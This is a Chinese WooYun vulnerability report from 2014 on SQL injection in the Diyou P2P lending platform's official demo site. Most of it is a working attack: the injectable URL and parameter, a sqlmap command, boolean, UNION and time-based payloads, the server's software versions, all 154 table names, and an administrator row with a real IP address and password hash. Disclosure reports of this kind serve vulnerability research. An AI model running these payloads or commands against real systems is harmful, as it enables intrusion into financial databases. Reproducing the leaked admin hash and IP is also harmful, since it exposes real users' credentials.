当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059834

漏洞标题:帝友P2P借贷系统最新版SQL注入

相关厂商:厦门帝网信息科技有限公司

漏洞作者: 秋风

提交时间:2014-05-07 23:16

修复时间:2014-08-02 23:18

公开时间:2014-08-02 23:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-07: 细节已通知厂商并且等待厂商处理中
2014-05-12: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-07-06: 细节向核心白帽子及相关领域专家公开
2014-07-16: 细节向普通白帽子公开
2014-07-26: 细节向实习白帽子公开
2014-08-02: 细节向公众公开

简要描述:

不描述了,忙着去改金额=。=

详细说明:

注入点:http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1


GET参数value未有效过滤导致存在注入
这是你们家的官网产品演示站对吧?
通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复!

python sqlmap.py -u "http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1" --batch -p "value" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: value
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND 4357=4357
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 UNION ALL SELECT NULL,CONCAT(0x71666b6271,0x59784658734a4b746348,0x7165616971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND SLEEP(5)
---
[21:47:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[21:47:58] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] www.diyou.cc
Database: www.diyou.cc
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| diyou_users       | 739     |
| diyou_users_admin | 40      |
| ...               | ...     |
+-------------------+---------+
Database: www.diyou.cc
[154 tables]
+-----------------------------+
| diyou_account               |
| diyou_account_balance       |
| diyou_account_bank          |
| diyou_account_cash          |
| diyou_account_fee           |
| diyou_account_fee_type      |
| diyou_account_log           |
| diyou_account_payment       |
| diyou_account_recharge      |
| diyou_account_users         |
| diyou_account_users_bank    |
| diyou_account_web           |
| diyou_approve               |
| diyou_approve_edu           |
| diyou_approve_edu_id5       |
| diyou_approve_id5           |
| diyou_approve_realname      |
| diyou_approve_sms           |
| diyou_approve_smslog        |
| diyou_approve_video         |
| diyou_areas                 |
| diyou_articles              |
| diyou_articles_pages        |
| diyou_articles_type         |
| diyou_attestations          |
| diyou_attestations_type     |
| diyou_attestations_user     |
| diyou_borrow                |
| diyou_borrow_activity       |
| diyou_borrow_amount         |
| diyou_borrow_amount_apply   |
| diyou_borrow_amount_log     |
| diyou_borrow_amount_type    |
| diyou_borrow_apply          |
| diyou_borrow_auto           |
| diyou_borrow_autolog        |
| diyou_borrow_care           |
| diyou_borrow_change         |
| diyou_borrow_count          |
| diyou_borrow_count_log      |
| diyou_borrow_credit         |
| diyou_borrow_fee            |
| diyou_borrow_fee_loan       |
| diyou_borrow_fee_log        |
| diyou_borrow_fee_type       |
| diyou_borrow_flag           |
| diyou_borrow_frost          |
| diyou_borrow_newtype        |
| diyou_borrow_preview        |
| diyou_borrow_recover        |
| diyou_borrow_repay          |
| diyou_borrow_roam           |
| diyou_borrow_style          |
| diyou_borrow_tender         |
| diyou_borrow_tender_auto    |
| diyou_borrow_tender_autolog |
| diyou_borrow_tender_web     |
| diyou_borrow_type           |
| diyou_borrow_verify         |
| diyou_borrow_vouch          |
| diyou_borrow_vouch_recover  |
| diyou_borrow_vouch_repay    |
| diyou_comment               |
| diyou_comments              |
| diyou_credit                |
| diyou_credit_class          |
| diyou_credit_log            |
| diyou_credit_rank           |
| diyou_credit_type           |
| diyou_dw_activity_review    |
| diyou_email                 |
| diyou_email_log             |
| diyou_email_port            |
| diyou_email_sendlog         |
| diyou_group                 |
| diyou_group_articles        |
| diyou_group_comments        |
| diyou_group_log             |
| diyou_group_member          |
| diyou_group_type            |
| diyou_linkages              |
| diyou_linkages_class        |
| diyou_linkages_type         |
| diyou_links                 |
| diyou_links_type            |
| diyou_message               |
| diyou_message_receive       |
| diyou_modules               |
| diyou_phone                 |
| diyou_phone_log             |
| diyou_phone_port            |
| diyou_phone_smslog          |
| diyou_rating_assets         |
| diyou_rating_company        |
| diyou_rating_contact        |
| diyou_rating_educations     |
| diyou_rating_finance        |
| diyou_rating_houses         |
| diyou_rating_info           |
| diyou_rating_job            |
| diyou_remind                |
| diyou_remind_log            |
| diyou_remind_type           |
| diyou_remind_user           |
| diyou_scrollpic             |
| diyou_scrollpic_type        |
| diyou_site                  |
| diyou_site_menu             |
| diyou_sms_type              |
| diyou_spread_add            |
| diyou_spread_log            |
| diyou_spreads_log           |
| diyou_spreads_set           |
| diyou_spreads_users         |
| diyou_sysauto_auto          |
| diyou_sysauto_log           |
| diyou_system                |
| diyou_system_type           |
| diyou_trust                 |
| diyou_trust_borrow          |
| diyou_trust_cash            |
| diyou_trust_gopay           |
| diyou_trust_ips             |
| diyou_trust_recharge        |
| diyou_trust_repay           |
| diyou_trust_tender          |
| diyou_ucenter               |
| diyou_ucenter_set           |
| diyou_users                 |
| diyou_users_admin           |
| diyou_users_admin_login     |
| diyou_users_admin_type      |
| diyou_users_adminlog        |
| diyou_users_care            |
| diyou_users_care_user       |
| diyou_users_email           |
| diyou_users_email_log       |
| diyou_users_examines        |
| diyou_users_friends         |
| diyou_users_friends_invite  |
| diyou_users_friends_type    |
| diyou_users_info            |
| diyou_users_log             |
| diyou_users_qq              |
| diyou_users_rebut           |
| diyou_users_reglog          |
| diyou_users_return_log      |
| diyou_users_set             |
| diyou_users_sina            |
| diyou_users_type            |
| diyou_users_upfiles         |
| diyou_users_vip             |
| diyou_users_viplog          |
| diyou_users_visit           |
+-----------------------------+
database: www.diyou.cc
table:    diyou_users_admin
[22:32:07] [INFO] resumed: 222.79.78.248
[22:32:07] [INFO] resumed: 1399448942
[22:32:07] [INFO] resumed: 2114
[22:32:07] [INFO] resumed: 320cb834bb58ab7d63ca5f8a21729988
[22:32:26] [INFO] resumed: 1
[22:32:26] [INFO] resumed: 120.36.190.40
[22:32:26] [INFO] resumed: 1398240030
[22:32:26] [INFO] resumed: 1
[22:32:26] [INFO] resumed: 127.0.0.1
[22:32:26] [INFO] resumed: 1386036527
.....................................
id | user_id | type_id | qq      | city | addip     | phone   | remark  | purview | addtime    | province | login_ip      | password                         | adminname | update_ip     | login_time | logintimes | update_time |
+----+---------+---------+---------+------+-----------+---------+---------+---------+------------+----------+---------------+----------------------------------+-----------+---------------+------------+------------+-------------+
| 1  | 1       | 1       | <blank> | 1326 | <blank>   | <blank> | <blank> | <blank> | <blank>    | 1310     | 222.79.78.248 | 320cb834bb58ab7d63ca5f8a21729988 .....................................
射出数据,只是时间问题,这里我就不跑了!

漏洞证明:

QQ图片20140507215948.jpg

修复方案:

有效过滤

版权声明:转载请注明来源 秋风@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-08-02 23:18

厂商回复:

最新状态:

2014-05-13:谢谢,刚看到。